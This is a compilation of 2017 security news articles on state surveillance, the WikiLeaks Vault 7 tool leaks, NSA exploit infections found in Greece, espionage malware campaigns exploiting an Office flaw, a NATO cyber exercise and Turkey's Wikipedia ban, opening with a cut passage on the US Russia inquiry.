Asked on CNN last week if she had yet seen evidence of collusion in private intelligence briefings, Feinstein responded: "Not at this time."

In Monday's open hearing, Yates -- an Obama deputy attorney general who was fired by Trump for refusing to support his immigration ban -- reportedly could testify that she warned the incoming administration in January that Flynn's discussions with Russia's US ambassador left Flynn vulnerable to blackmail.

A former military intelligence chief, Flynn was Trump's national security adviser for 24 days before he was fired for lying about the substance of the calls.

Clapper, still bound by secrecy requirements of his former job, might not add more than what the intelligence community has already said publicly about the scandal.

- Subpoena warnings -

The more serious investigative action in the coming weeks will take place out of the public eye. The House and Senate intelligence committees are holding interviews with current intelligence and Trump campaign officials behind closed doors.

The Senate side has warned possible witnesses, including Flynn, Page and Manafort, that they could be subpoenaed to testify if they do not voluntarily cooperate, according to the New York Times.

In a statement Friday, the top senators of the Senate committee specifically warned Page, a former Moscow-based investment banker, to meet their week-old request for specific documents.

"Should Mr. Page choose to not provide the material requested" by specified dates, they said, "the committee will consider its next steps."


UK Government’s secret programme for mass surveillance on internet and phones leaked
7.5.2017 securityaffairs BigBrothers

According to a draft document leaked online, UK Government is assigning itself more powers to spy on live communications and use malware for surveillance.
While the NSA is announcing it will stop surveillance activities on emails, texts, and other internet communications, the UK government has secretly drawn up more details of its new bulk surveillance powers. – awarding itself the ability to monitor Brits’ live

The UK Government is assigning itself more powers to spy on live communications and use malware for surveillance purposes.

UK gov surveillance draft

In the draft technical capability notices paper, the UK Government requests communications companies to provide real-time access to the full content of any named individual within one working day, along with “secondary data” relating to that person.

The draft document was obtained by the Open Rights Group, which leaked it.

“To provide and maintain the capability to carry out the interception of, or the obtaining of secondary data from, communications transmitted by means of a postal service and to disclose anything obtained under the warrant to the person to whom the warrant is addressed or any person acting on that person’s behalf within one working day, or such longer period as may be specified in the technical capability notice, of the postal operator being informed that the warrant has been issued.” states the draft. “To provide and maintain the capability to disclose secondary data in a form specified in the technical capability notice. “

The UK Government intends to have the ability to spy also on encrypted communications, this means that it will request every company operating communication services to not implementing end-to-end encryption or to insert a backdoor.

The authorities will request communication providers to allow bulk surveillance by deploying real-time interception systems that will allow spying on 1 in 10,000 their customers.

The live surveillance if any individual has to be authorized from secretaries of state and overseen by a judge appointed by the prime minister.

The worrying aspect of the draft is that the document has only been provided to a select number of ISPs and telcos companies for a four-week consultation.

The draft reports that is content has already passed through the UK’s Technical Advisory Board currently composed by telco companies (O2, BT, BSkyB, Cable and Wireless, Vodafone and Virgin Media) and six representatives from the government’s intercepting agencies.

The rules will have to be approved by the two houses of Parliament before becoming law.


Wikileaks Unveils CIA's Man-in-the-Middle Attack Tool
6.5.2017 thehackernews  BigBrothers

Wikileaks has published a new batch of the Vault 7 leak, detailing a man-in-the-middle (MitM) attack tool allegedly created by the United States Central Intelligence Agency (CIA) to target local networks.
Since March, WikiLeaks has published thousands of documents and other secret tools that the whistleblower group claims came from the CIA.
This latest batch is the 7th release in the whistleblowing organization's 'Vault 7' series.
Dubbed Archimedes, the newly released CIA tool, dumped on Friday, purportedly used to attack computers inside a Local Area Network (LAN).
According to the leaked documents, this MitM tool was previously named 'Fulcrum' but later was renamed to 'Archimedes' with several improvements on the previous version, like providing a way to "gracefully shutting down the tool on demand," and adding "support for a new HTTP injection method based on using a hidden iFrame."
The leaked documents describe Archimedes as a tool that lets users redirect LAN traffic from a targeted computer through a malware-infected computer controlled by the CIA before the traffic is passed on to the gateway, which is known as man-in-the-middle (MitM) attack.

The tool in itself is very simple without any extraordinary capabilities, as there are many MitM tools available on the Internet that anyone can be download and use it to target users on the local network.
Rendition Infosec founder Jake Williams also pointed out that the tool is not even originally developed by the CIA, rather appears to be a repackaged version of Ettercap – an open source toolkit for MitM attacks.
Williams also noted that the potential CIA targets could even use the leaked information to see whether their computers had been targeted by the agency.
Last week, WikiLeaks dumped source code for a more interesting CIA tool known as "Scribbles," a piece of software allegedly designed to embed 'web beacons' into confidential documents, allowing the spying agency to track insiders and whistleblowers.
Since March the Whistleblowing website has published 7 batches of "Vault 7" series, which includes the latest and last week leaks, along with the following batches:
"Year Zero" – dumped CIA hacking exploits for popular hardware and software.
"Weeping Angel" – spying tool used by the agency to infiltrate smart TV's, transforming them into covert microphones.
"Dark Matter" – focused on hacking exploits the agency designed to target iPhones and Macs.
"Marble" – revealed the source code of a secret anti-forensic framework, basically an obfuscator or a packer used by the CIA to hide the actual source of its malware.
"Grasshopper" – reveal a framework which allowed the agency to easily create custom malware for breaking into Microsoft's Windows and bypassing antivirus protection.


WikiLeaks Details MitM Attack Tool Used by CIA

6.5.2017 securityweek BigBrothers
WikiLeaks has released documents detailing a man-in-the-middle (MitM) attack tool allegedly used by the U.S. Central Intelligence Agency (CIA) to target local networks.

The tool, initially called Fulcrum and later renamed Archimedes by its developers, can be used to conduct MitM attacks within a local area network (LAN). The leaked documents, dated between 2011 and 2014, describe it as a tool that allows the user to redirect LAN traffic from a targeted computer through an attacker-controlled machine before it’s passed on to the gateway.

“This enables the tool to inject a forged web-server response that will redirect the target’s web browser to an arbitrary location. This technique is typically used to redirect the target to an exploitation server while providing the appearance of a normal browsing session,” developers wrote in the tool’s user guide.

Jake Williams, founder of Rendition Infosec and SANS instructor, analyzed the leaked documents and determined that the tool appears to be a repackaged version of Ettercap, a popular MitM tool.

While the tool’s capabilities are not impressive, Williams pointed out that potential targets of the CIA can use the leaked information to see if their systems had been targeted by the agency.

23h
Jake Williams @MalwareJake
.@wikileaks In short, nothing to get excited about media peeps. I was talking about this capability to an entry level hacking class Wed night 5/n
Follow
Jake Williams @MalwareJake
.@wikileaks Honestly I'm more interested in how WikiLeaks tries to spin this than I am in the tool itself. 6/6
12:41 PM - 5 May 2017
Retweets 3 3 likes

A more interesting tool, including its source code, was published by WikiLeaks last week. The project, dubbed Scribbles, is designed for inserting special watermarks into documents that may be copied by insiders and whistleblowers.

The first major version of the Scribbles tool was released in March 2016 and it may have been developed by the CIA to identify people such as Edward Snowden, who in 2013 leaked a massive amount of information on the NSA’s surveillance capabilities.

WikiLeaks has already released numerous documents as part of its “Vault 7” dump. In the past weeks, the whistleblower organization has made public documents describing various tools, including ones for hacking Samsung smart TVs, a framework used to make attribution and analysis of malware more difficult, and a platform designed for creating custom malware installers.

Many of the tools are outdated and the vulnerabilities they leverage have already been patched. However, the leaked information can be very useful for entities that may have been targeted with these exploits.

In fact, researchers at Symantec and Kaspersky have found links between the tools exposed by Wikileaks and the malware used by a cyber espionage group tracked as Longhorn and The Lamberts.


WikiLeaks leaked documents that detail the Archimedes tool used by the CIA in MitM attacks
6.5.2017 securityaffairs BigBrothers

WikiLeaks has released a news batch of documents detailing the Archimedes tool, a MitM attack tool allegedly used by the CIA to target LAN networks.
WikiLeaks has released a news batch of documents detailing a man-in-the-middle (MitM) attack tool dubbed Archimedes allegedly used by the CIA to target local networks.

The leaked documents, dated between 2011 and 2014, provide details about a tool initially codenamed Fulcrum and later renamed Archimedes by the development team.

Archimede Tool

The CIA hacking tool that allows the operators to redirect LAN traffic from a targeted computer through a machine controlled by the attackers before it is routed to the gateway.

“Archimedes is an update to Fulcrum 0.6.1.” reads the Archimedes Tool Documentation. “Archimedes is used to re­direct LAN traffic from a target’s computer through an attacker controlled computer before it is passed to the gateway. This enables the tool to inject a forged web­server response that will redirect the target’s web browser to an arbitrary location. This technique is typically used to redirect the target to an exploitation server while providing the appearance of a normal browsing session. For more tool information please refer to the original Fulcrum 0.6.1 documentation.”

According to the SANS instructor Jake Williams who analyzed the leaked documents, the Archimedes tool seems to be a repackaged version of popular MitM tool Ettercap.

Follow
Jake Williams @MalwareJake
The new dump by @wikileaks, FULCRUM, appears to be nothing more than a repackaged ettercap. Honestly nothing to write home about 1/n
12:34 PM - 5 May 2017
5 5 Retweets 3 3 likes
CIA alleged targets can use the leaked information about the Archimedes tool to check if their systems had been compromised by the US Intelligence.

Potential victims can search for these hashes on their systems.

Archimedes Tool

Archimedes introduced several improvements respect the Fulcrum tool such as:

Support disabling the route verification check that occurs prior to exploitation.
Add support for a new HTTP injection method based on using a hidden IFRAME.
Modify the DLLs to support the Fire and Forget specification (version 2).
Provide a method of gracefully shutting down the tool on demand.
Removes the most alerting strings from the release binaries.
The tool itself is not sophisticated, it could be interesting to understand how CIA agents did use it in targeted attacks.


NSA Cyber Weapons installed in High Profile Targets in Greece
4.5.2017 securityaffairs BigBrothers

The installation of monitoring software has been conducted either by NSA highly sophisticated hacking team or by hackers who leveraged the tools leaked by the Shadow Brokers.
Last week, a collection of spy tools allegedly used by the National Security Agency for operations against global targets of interest was leaked online by the underground hacking group, Shadow Brokers.

The tools were released online in the following form and were accessible to anyone:

NSA Cyber Weapons
NSA’s cyber-weapons include many exploits for Microsoft Windows, Lotus Notes, MDaemon Webadmin, IIS, Solaris systems and Microsoft Exchange, as well as additional Python-based tools.

NSA Cyber Weapons

These tools (Fuzzbunch, Eternalblue, Doublepulsar, Danderspritz) are part of the powerful NSA hacking toolset (also known as NSA Metasploit) exploited by the intelligence organization for hacking operations against governments, companies, and organizations.

NSA Cyber Weapons

THE RESEARCH

SecNews researchers conducted a thorough study of the Shadow Brokers leak, mainly focusing on its effects. As it has been known, the NSA backdoor has already been installed on thousands of computers and servers around the world. A map of the affected countries is presented below:

NSA Cyber Weapons

The purpose of SecNews research, considering the importance of the leaked data, was to identify companies or networks exclusively from the Greek Territory that have been targeted by malicious activities related to NSA’s cyber weapons.

After analyzing the leaked NSA toolkit and taking into consideration its particular digital features, we conducted an investigation as to detect which IP addresses in Greece are affected by the NSA cyber weapons!

The assessment procedure was carried out in the following steps:

Firstly, we scanned the Greek Internet for publicly exposed SMB (Port 445) & Remote Desktop (RDP Port 3389) services.
We detected 1086 IP addresses with SMB enabled online
We detected 4263 IP addresses with Remote Desktop enabled online
Then, using properly parameterized scripts like Mass-scan, detect_doublepulsar_rdp & smb (Python) and in conjuction with the NSA-leaked files, we detected where the cyber weapon is installed.
The final findings/results are shown in the table below. For security reasons, the IP addresses are hidden, as to protect the targeted companies/organizations. Thus, it is not possible for a malicious user to use the mentioned cyber-weapon for his own benefit.

NSA Cyber Weapons

CONCLUSIONS

According to the findings, the NSA remote access software was installed:

Within the network (AIA-Cust3-Infr) of Athens International Airport “Eleftherios Venizelos”. We are not in a position to know whether the network is related to the airport’s infrastructure or to a third party company in which the airport provides backbone access.
On a web server (accessible via the internet) belonging to SKAI TV, one of the largest media groups in Greece.
On a server belonging to Vodafone (or an affiliated company).
On a server / part of the Internal Network Management system of Interworks Cloud (interworks.biz, webserve.gr). It is worth mentioning that the Business marketplace of the telecommunications company Wind (windbusiness.com.gr) is located in the same IP class.
On a PC with DSL / VDSL connection (OTE/Cosmote) but it’s not known whether it is a corporate customer or a home user. In every case, it does not seem to have any correlation with OTE / Cosmote ‘s critical infrastructure.
Within a server of SYKARIS (possibly a graphic arts company).
Within a server of MELKA (possibly a construction company).
On a terminal / server of the Civil Engineering Department of The Aristotle University of Thessaloniki.
On a terminal / server of the Technological Educational Institute of Epirus, in the VLAN management system.
On a terminal at the University of Thessaly (possibly a remote DSL connection).
According to our research, all of the aforementioned systems were infected with the “Doublepulsar” exploit. Doublepulsar allows an attacker to install malicious software of choice, that can not be tracked as a DLL.

“It must be mentioned that we can not know whether the installation of the cyber weapons was conducted by the NSA or third-party hackers who leveraged the tools leaked by the ShadowBrokers. One think is sure, however, that the affected companies/organizations should immediately test and evaluate their systems security (and especially if the affected systems are related to internal networks).”

The same procedure that we’ve applied during our research to the Greek Public Internet, can be also implemented on internal servers, in order to check if the cyber-monitoring software is installed. The aforementioned targets are ought to conduct digital analysis and security audits as to get an objective analysis of the affected servers.

SecNews researchers are at the disposal of administrators or legal representatives of the affected companies, organizations, and entities, as to provide them with any additional information needed. Details on the assessment procedure or οn how security audits can be performed on an internal network can be also provided, after the detection of a related infection by the administrators and the identification of its extent.


Cyberspies Use KONNI Malware to Target North Korea

4.5.2017 securityweek BigBrothers
A remote access Trojan (RAT) that managed to stay under the radar for more than 3 years has been used by cyberspies to target organizations linked to North Korea, Cisco’s Talos research and intelligence group reported on Wednesday.

The malware, dubbed by researchers “KONNI,” has evaded detection likely due to the fact that it has only been used in highly targeted attacks. The malware has evolved over the years, with recent versions capable of stealing data and executing arbitrary code on infected systems.

Talos is aware of several campaigns using this piece of malware over the past years. The first, likely launched in September 2014, involved an SRC file acting as a dropper for two other files: a picture that served as a decoy and the KONNI executable.

In this attack, the KONNI malware was designed to be executed only once and steal information from the infected device, including keystrokes, clipboard content, and data associated with the Chrome, Firefox and Opera web browsers.

The second campaign, observed last year, also involved an SRC file, but this time it dropped two office documents. These documents, one written in English and one in Russian, referenced the tension between North Korea and the U.S., and they were titled “N. Korean hydrogen bomb can wipe out Manhattan: propaganda outlet.”

The 2016 attacks leveraged malware that had a different architecture, and introduced new features that also allowed attackers to upload and download files, and execute arbitrary commands. While analyzing this campaign, researchers found evidence suggesting that an operation also took place in 2015.

Experts have already spotted two KONNI campaigns this year. One of the decoy documents was titled “Pyongyang e-mail lists - April 2017” and it contained the email addresses and phone numbers of individuals working at organizations such as the United Nations, UNICEF and embassies linked to North Korea.

Another decoy document, titled “Inter Agency List and Phonebook - April 2017” contained names and contact information for members of agencies, embassies and other public organizations connected to North Korea. Researchers said it’s unclear if these are legitimate files that have been stolen by the cyberspies or if the attackers created the documents themselves.

Compared to previous versions, the latest malware samples are also capable of collecting system information and capturing screenshots. The threat actor has also created 64-bit versions of the malware.

The fact that 3 of the 4 campaigns analyzed by Cisco were aimed at organizations linked to North Korea has led researchers to believe that the threat group behind KONNI has a real interest in this country. The latest attack started a few days ago and it’s still active.


China-Linked Spies Use Recent Zero-Day to Target Financial Firms

2.5.2017 securityweek BigBrothers
A cyber espionage group has targeted analysts working at major financial firms using a recently patched Microsoft Office vulnerability, Proofpoint reported last week.

The threat actor, tracked by the security firm as TA459, has been active since at least 2013 and it’s believed to be operating out of China. The cyberspies have been known for using malware such as NetTraveler (aka TravNet), PlugX, Saker, Netbot, DarkStRat, and ZeroT in attacks aimed at organizations in Russia and neighboring countries.

Proofpoint recently detailed a series of attacks launched by the group against military and aerospace organizations in Russia and Belarus.

On April 20, researchers spotted a campaign aimed at global financial firms operating in Russia and neighboring countries. Given that the attacks were apparently aimed at analysts covering the telecommunications industry, experts believe this latest operation is likely a continuation of a similar campaign first analyzed in the summer of 2015.

In the recent attacks, TA459 sent out spear-phishing emails containing a Word document set up to exploit a recently patched remote code execution vulnerability tracked as CVE-2017-0199. The attackers started leveraging this flaw just days after Microsoft released a fix.

When the malicious document is opened, an HTML application (HTA) file disguised as an RTF document is downloaded. PowerShell is then used to download and execute a script that fetches and runs the ZeroT downloader.

ZeroT was analyzed by Proofpoint when it investigated the recent attacks aimed at military and aerospace organizations, but some changes and improvements have been made in the latest version. One of the changes is the use of a legitimate McAfee utility for sideloading instead of a Norman Safeground utility.

While ZeroT is the threat actor’s most common first stage payload, the second payload includes various pieces of malware. In recent attacks, Proofpoint noticed both PlugX and a Trojan tracked as PCrat/Gh0st, which is used less often by the group.

“Multinational organizations like the financial services firms targeted here must be acutely aware of the threats from state-sponsored actors working with sophisticated malware to compromise users and networks,” Proofpoint researchers explained. “Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular areas of research and expertise further complicate an already difficult security situation for organizations dealing with more traditional malware threats, phishing campaigns, and socially engineered threats every day.”

The fact that the threat actor has used CVE-2017-0199 in its operation is not surprising. The flaw had been exploited by several groups before Microsoft released a patch for it, and others, including Iranian hackers, started using it shortly after its existence came to light.


NSA announces it will stop surveillance activities on emails, texts and other internet communications
2.5.2017 securityaffairs BigBrothers

NSA announces a change in its surveillance activities, it will no longer spy on citizens’ emails, texts, and other Internet communications.
It is official, the US NSA announced it will no longer spy on emails, texts and other internet communications that mention targets of surveillance.The NSA issued the official statement last week, announcing a historical change of tactic about surveillance activities on specific foreign targets located outside the United States.
“Since 2008, the National Security Agency (NSA) and other members of the U.S. Intelligence Community have relied on Section 702 of the Foreign Intelligence Surveillance Act (FISA) to conduct surveillance on specific foreign targets located outside the United States to acquire critical intelligence on issues ranging from international terrorism to cybersecurity.” reads the NSA’s statement.”After a comprehensive review of mission needs, current technological constraints, United States person privacy interests, and certain difficulties in implementation, NSA has decided to stop some of its activities conducted under Section 702.”

NSA surveillance activities

In the past NSA cyber spies were flagging any communication where a foreign surveillance target was mentioned, even when the target wasn’t involved in the conversation.

The NSA reform will involve upstream surveillance collection and not other surveillance activities such as the PRISM program.

“After considerable evaluation of the program and available technology, NSA has decided that its Section 702 foreign intelligence surveillance activities will no longer include any upstream internet communications that are solely “about” a foreign intelligence target.” continue the statement.”Instead, this surveillance will now be limited to only those communications that are directly “to” or “from” a foreign intelligence target. These changes are designed to retain the upstream collection that provides the greatest value to national security while reducing the likelihood that NSA will acquire communications of U.S. persons or others who are not in direct contact with one of the Agency’s foreign intelligence targets.”

The NSA will delete most of the data collected during its surveillance activity.Officially the NSA decided to stop conducting surveillance activities because of technological difficulties and to respect the privacy of the US citizens.In many cases, the US intelligence has inadvertently collected citizens’ communications while conducting its surveillance activities.Of course, the NSA statement represents an important success for Privacy advocates.https://twitter.com/Snowden/status/858021773425729543
Edward Snowden defined this reforms the most substantive of the post-2013 NSA reforms.


North Korea-Linked Hacker Group Poses Serious Threat to Banks: Kaspersky

1.5.2017 securityweek BigBrothers
A North Korea-linked hacking group responsible for multiple financial and destructive attacks is believed to be the most serious threat against banks, security firm Kaspersky Lab says.

The group, referred to as BlueNoroff or Lazarus, has been associated with numerous high profile attacks over the past several years, including the devastating attack against Sony Pictures in late 2014. Last year’s $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank has been attributed to this group as well.

The actor is also believed to have orchestrated an attack aimed at banks in Poland earlier this year, where the website of the Polish Financial Supervision Authority (knf.gov.pl) was hijacked and abused to deliver malware. The hackers inserted Russian words as decoy in the malware used in this attack, security researchers discovered.

Active since 2009 or earlier, Lazarus is believed to have been conducting a large campaign aimed at financial institutions worldwide. The operation is ongoing, with the most recent malware samples found in March. Kaspersky Lab says that currently the group “is probably the most serious threat against banks.”

BlueNoroff/Lazarus is, however, only one of the more than 100 threat actors and sophisticated malicious operations that Kaspersky Labs is monitoring at the moment. The attacks target commercial and government organizations in over 80 countries and show an evolution of these actors, with both Advanced Persistent Threat (APT) actors and financially motivated cybercriminals using the same tactics, techniques, and procedures (TTPs).

Other APT groups that were active during the first quarter of the year were Shamoon and StoneDrill, two separate actors that have aligned interests and which might be working together. Aimed at Saudi targets, the two malware families pack disk-wiping capabilities, which makes them extremely destructive.

According to Kaspersky, StoneDrill appears to have been around since 2014, with old samples attributed to the NewsBeef (Charming Kitten) group. The samples share the same credentials (username and password) for command and control (C&C) communications, and the security researchers suggest that StoneDrill might be a more recent version of NewsBeef artifacts.

Recently, StoneDrill was also used in attacks against targets in the energy industry in Europe, which suggests that the actor is expanding its reach outside of the Middle East, the security researchers suggest.

Another piece of malware related to the Shamoon attacks is Ismdoor, a backdoor used in Saudi Arabia to target the oil and energy industry. The attackers were also found to have used mainly Powershell-based tools for lateral movement, and to have adopted the trend of using fileless generic malware for nefarious operations.

The use of generic tools in attacks has been generally associated mainly with “not-so-big actors or cybercriminals,” who wouldn’t create their own set of malicious programs. Some of the available frameworks that offer many options, especially for lateral movement, include Nishang, Empire, Powercat, and Meterpreter, all of which are based on Powershell and allow the use of fileless backdoors.

“We have seen such techniques being widely adopted in the last few months. We find examples in the lateral movement tools used in Shamoon attacks, in attacks against Eastern European banks, and used by different APT actors such as CloudComputating, Lungen or HiddenGecko, as well as in the evolution of old backdoors like Hikit, which evolved to new fileless versions,” Kaspersky Lab explains.


Iranian Hackers Exploit Recent Office 0-Day in Attacks: Report

1.5.2017 securityweek BigBrothers
A recently patched vulnerability in Microsoft Office has been abused by Iranian threat actors in attacks against Israeli organizations, researchers from security firm Morphisec reveal.

Carried out between April 19 and April 24, 2017, the politically-motivated, targeted campaign was leveraging the CVE-2017-0199 vulnerability in Office that Microsoft patched earlier this month, after it had been already abused in live attacks. Because many organizations failed to apply the patch, however, the vulnerability continues to offer a viable attack surface.

The attacks targeting Israeli organizations, Morphisec explains, were delivered through compromised email accounts at Ben-Gurion University, which is home to Israel’s Cyber Security Research Center. The actors behind the attack used an existing proof-of-concept (published after the patch was released) to deliver a fileless variant of the Helminth Trojan agent.

The security researchers identified Israeli high-tech development companies, medical organizations and education organizations as victims of the attacks. They also attribute the assaults to an Iranian hacker group known to be responsible for the OilRig malware campaigns.

According to Morphisec, the analyzed Helminth fileless agent was found to be a near perfect match to the OilRig campaign that hit 140 financial institutions in the Middle East last year (at the beginning of 2017, the same actor was revealed to have used a fake Juniper Networks VPN portal and fake University of Oxford websites to deliver malware to several Israeli organizations).

The security researchers also reveal that the threat actors decided to switch from malicious macros in Excel and Word documents to a vulnerability exploit. It’s also worth noting that the group set up the attack fast, mainly because there was only a small window of opportunity between the patch release and rollout.

The abused vulnerability allows actors to use malicious HTA (HTML Application) files that Object Linking and Embedding (OLE) functionality in decoy RTF (Rich Text Format) documents linked to. Once the victim opens the malicious RTF, the HTA file is downloaded, which loads and executes a final payload.

Microsoft addressed the issue in its April 11 set of security patches, but not before cybercriminals started abusing it in new attacks. Some of the most prominent threats observed leveraging the exploit included Dridex, along with Latentbot and WingBird.

“Every few years, a new ‘logic bug’ CVE in OLE object linking is identified; the previous one was three years ago (CVE-2014-0640). This kind of vulnerability is rare but powerful. It allows attackers to embed OLE objects (or links in the case of CVE-2017-0199) and bypass Microsoft validation of OLE execution without warning. In essence, it is the same as playing animation in PowerPoint,” the security researchers conclude.


NATO Locked Shields 2017, world’s largest cyber defence exercise just ended
1.5.2017 securityaffairs BigBrothers

Locked Shields is the world’s largest and most advanced international technical live-fire cyber defence exercise organized by the NATO since 2010.
Locked Shields is the world’s largest and most sophisticated international cyber defence exercise. It is an annual event since 2010, Locked Shields is organized by the NATO Cooperative Cyber Defence Centre of Excellence and aims to trains security experts who protect national IT infrastructure.

Locked Shields 2017 is organised in cooperation with the Estonian Defence Forces, the Finnish Defence Forces, the Swedish Defence University, the British Joint Army, the United States European Command, Air Operations COE and Tallinn University of Technology.

This year edition was recently concluded (24–28 Apr 2017), it involved around 800 participants from 25 nations.

While the organisers of the Locked Shields 2017 exercise were in Tallinn, Estonia, the participating Blue Teams worked remotely through secure connections from their home bases.

The exercise stresses participants asking them to face different trials, including organizing an incident response, solving forensic challenges, and responding to legal and strategic communications and scenario injects.

Locked Shields 2017

Locked Shields is a strategic event that puts participants in front of cutting-edge technologies and hacking techniques, this is the only way to face even more complex cyber threats in a real word cyber scenario.

“To stay abreast of market developments, Locked Shields focuses on realistic and cutting-edge technologies, networks and attack methods.” reads the official announcement.

The cyber defence exercise was just ended, the Blue Teams have been tasked to maintain the services and networks of a military air base of a fictional country.

In the simulation, the air base was experiencing a wide range of cyber attacks on its electric power grid system, unmanned aerial vehicles, military command and control systems, critical information infrastructure components and other operational infrastructure.

“The size and scope of technologies, networks and devices used in Locked Shields 2017 has increased considerably – leading to more attacks and specialised systems involved.” continues the announcement. “Specialised systems enable teams to practice the defence of systems that they are not working with on a regular basis. However, in the modern threat landscape incidents with specialised systems may potentially have a profound effect on a military mission or the entire society.”

The experts launched more than 2500 possible attacks against Blue Teams, according to the NATO IT staff more than 3000 virtualised systems have been deployed during the exercise.
For this first time in the history of the event, this year the NATO has run a strategic track to the exercise.

The exercise also involved industry partners such as Siemens AG, Threod Systems, Cyber Test Systems, Clarified Security, Iptron, Bytelife, BHC Laboratory, openvpn.net, GuardTime and numerous others.

The Italian team was composed of a group of experts from three armed forces, Carabinieri, along with researchers from CINECA (Interuniversity Consortium for the Management of Electronic Calculation Center), Universities of Rome La Sapienza and Genoa.

The Ministry of the Interior also took part in the exercise with a group of analysts from the National Anti-Crime Center for Critical Infrastructure Protection (CNAIPIC).


Turkey banned Wikipedia because its content web contents that represents a threat to national security
30.4.2017 securityaffairs BigBrothers

The monitoring group Turkey Blocks confirmed that Turkey banned Wikipedia because its content web content that represents a threat to national security.
According to the telecommunications watchdog, Turkey has blocked the access to the online encyclopedia Wikipedia on Saturday, the Government has taken this decision citing a law that allows it to ban access to web contents that represents a threat to national security.

Under the law, the watchdog has to submit the ban to a court within 24 hours, then the court has two days to decide whether the ban should be confirmed.

“After technical analysis and legal consideration … an administrative measure has been taken for this website (Wikipedia.Org),” the BTK telecommunications watchdog said in a statement on its website.

turkey banned wikipedia

Monitoring group Turkey Blocks first observed the block of Wikipedia at 8:00 a.m. (1.00 a.m. ET) on Saturday.

“The loss of availability is consistent with internet filters used to censor content in the country,” reported Turkey Blocks.


Turkey Blocks ✔ @TurkeyBlocks
Confirmed: All editions of the #Wikipedia online encyclopedia blocked in #Turkey as of 8:00AM local timehttps://turkeyblocks.org/2017/04/29/wikipedia-blocked-turkey/ …
7:22 AM - 29 Apr 2017
2,770 2,770 Retweets 936 936 likes
The Turkish communications Ministry announced that Wikipedia has been banned due to its attempts to run a “smear campaign” against Turkey. Some pages in the encyclopedia purported that the Turkish Government was coordinating with militant groups.

“Instead of coordinating against terrorism, it has become part of an information source which is running a smear campaign against Turkey in the international arena,” reported the Anadolu Agency.

Turkey it asking Wikipedia to remove the content that doesn’t meet its demands, only in this case, the ban will be lifted.


Turkey Blocks ✔ @TurkeyBlocks
Confirmed: All editions of the #Wikipedia online encyclopedia blocked in #Turkey as of 8:00AM local timehttps://turkeyblocks.org/2017/04/29/wikipedia-blocked-turkey/ …
7:22 AM - 29 Apr 2017
2,770 2,770 Retweets 936 936 likes
Turkey has adopted similar measures in the past, the Government blocked major social media platforms such as Twitter or Facebook. The Turkish Government always denied censorship actives and blamed outages on spikes in usage after major events.

Security experts confirmed that the blackouts on social media are the result of the operations of the government to stop the spread of militant images and propaganda.

“President Tayyip Erdogan says the measures are needed given the scope of the security threat Turkey faces.” reported the Reuters agency.

“Turkey last year jailed 81 journalists, making it the world’s top jailor of journalists, according to the New York-based Committee to Protect Journalists.”


US NSA Spy Agency Halts Controversial Email Sweep

30.4.2017 securityweek BigBrothers
The National Security Agency announced Friday it would end its controversial practice of sweeping up any email or text message an American exchanges with someone overseas that makes reference to a real target of NSA surveillance.

The powerful US spy agency said that although it has the legal power to continue scooping up such communications, it would halt the practice to protect the privacy of US citizens.

"NSA will no longer collect certain internet communications that merely mention a foreign intelligence target," it said in a statement.

The NSA, the country's premier signals intelligence body, is permitted to collect communications of any foreign target, but not that of Americans except in certain situations, or if it gains a warrant to do so.

Under Section 702 of the Foreign Intelligence Surveillance Act, it is allowed to scoop up a US citizen's emails or texts with someone outside the country if those merely mention a specific NSA surveillance target -- so-called "about" collection.

The practice has sparked heavy criticism from civil liberties advocates, who say it violates constitutional protections. Many have threatened to try to block the renewal of Section 702 at the end of this year if the law is not tightened. But the country's intelligence community wants the law to be renewed unchanged.

The NSA said it would voluntarily end "about" collection even if it means that it might lose access to other important information in the fight against cyber threats and terrorism.

Senator Ron Wyden, a Democrat on the Senate Intelligence Committee, praised the move but said that Section 702 needs multiple changes.

"To permanently protect Americans' rights, I intend to introduce legislation banning this kind of collection in the future," he said.


Wikileaks revealed the Scribbles tool used by the CIA to mark documents and track whistleblowers
29.4.2017 securityaffairs BigBrothers

Wikileaks has published a new piece of the Vault 7 leak that details a CIA project codenamed Scribbles (a.k.a. the “Snowden Stopper”).
Scribbles is a software allegedly developed to embed ‘web beacon’ tags into confidential documents aiming to track whistleblowers and foreign spies.

Wikileaks has leaked the Scribbles documentation and its source code, the latest released version of Scribbles (v1.0 RC1) is dated March 1, 2016, the date suggests it was used until at least last year.

According to documents leaked by Wikileaks, Scribbles is “a document-watermarking preprocessing system to embed “Web beacon”-style tags into documents that are likely to be copied by Insiders, Whistleblowers, Journalists or others.”

The Scribbles software was written in C# programming language and generate a random watermark that is inserted in each document.

“(S//OC/NF) Scribbles (SCRIB) is a document watermarking tool that can be used to batch process a number of documents in a pre-seeded input directory. It generates a random watermark for each document, inserts that watermark into the document, saves all such processed documents in an output directory, and creates a log file which identifies the watermarks inserted into each document.” reads the Scribbles user guide.

Every time the watermarked document is accessed by anyone it will load an embedded file in the background and creates an entry on the CIA’s tracking server. The record related to an access of a document contains the information about who accessed it, the time stamp and its IP address. In this way, it is possible to track document accesses and any abuses.
Unfortunately for the CIA agents, the Scribbles software only works with Microsoft Office. According to the user manual, the CIA tool was developed for off-line preprocessing of Microsoft Office documents, this means that if the watermarked documents are opened in any other application like OpenOffice or LibreOffice, they may reveal watermarks and URLs to the user.

According to the leaked documents, “the Scribbles document watermarking tool has been successfully tested on…Microsoft Office 2013 (on Windows 8.1 x64), documents from Office versions 97–2016 (Office 95 documents will not work!) [and]…documents that are not be locked forms, encrypted, or password-protected.”

Another limitation of the software is that watermarks are loaded from a remote server, so the tool should work only when the user accessing the marked documents is connected to the Internet.

This is the last batch of files released by Wikileaks, in order of time the organization leaked:
The Year Zero that revealed CIA hacking exploits for hardware and software.
The Dark Matter dump containing iPhone and Mac hacking exploits.he “
The Marble batch focused on a framework used by the CIA to make hard the attribution of cyber attacks.
The Grasshopper batch that reveals a framework to customize malware for breaking into Microsoft’s Windows and bypassing antivirus protection.


Hack'em If You Can — U.S. Air Force launches Bug Bounty Program
27.4.2017 thehackernews BigBrothers
With the growing number of data breaches and cyber attacks, a significant number of companies and organizations have started Bug Bounty programs for encouraging hackers and bug hunters to find and responsibly report vulnerabilities in their services and get rewarded.
Now, following the success of the "Hack the Pentagon" and "Hack the Army" initiatives, the United States Department of Defense (DoD) has announced the launch of the "Hack the Air Force" bug bounty program.
Hacking or breaking into Defense Department networks was illegal once, but after "Hack the Pentagon" initiative, the DoD started rewarding outsiders to finding and reporting weaknesses in its private networks.
